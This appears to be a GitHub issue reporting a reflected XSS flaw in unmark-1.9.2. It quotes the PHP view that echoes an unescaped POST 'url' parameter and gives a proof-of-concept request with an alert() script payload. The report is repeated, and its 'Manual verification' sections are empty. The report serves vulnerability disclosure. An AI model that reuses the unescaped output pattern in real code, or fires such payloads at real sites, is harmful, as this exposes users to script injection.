Open xjzzzxx opened 4 months ago
Hello,
I would like to report for a xss vulnerability in unmark-1.9.2.
The path of the vulnerability.
In file application/views/marks/add_by_url.php
if ( $_POST ) : // Line 3 $url = $_POST['url']; // Line 7 echo '<p><strong>URL:</strong>' . $url . '</p>'; // Line 8
We see that there is no check between the input $_POST["url"] and the output(Line 8)
Thus the XSS will happen at echo '<p><strong>URL:</strong>' . $url . '</p>';
echo '<p><strong>URL:</strong>' . $url . '</p>';
Poc:
POST /marks/add_by_url
add_from_url=1&url=</p><script>alert('xss')</script>
Manual verification:
Hello,
I would like to report for a xss vulnerability in unmark-1.9.2.
The path of the vulnerability.
In file application/views/marks/add_by_url.php
We see that there is no check between the input $_POST["url"] and the output(Line 8)
Thus the XSS will happen at
echo '<p><strong>URL:</strong>' . $url . '</p>';Poc:
POST /marks/add_by_url
add_from_url=1&url=</p><script>alert('xss')</script>Manual verification: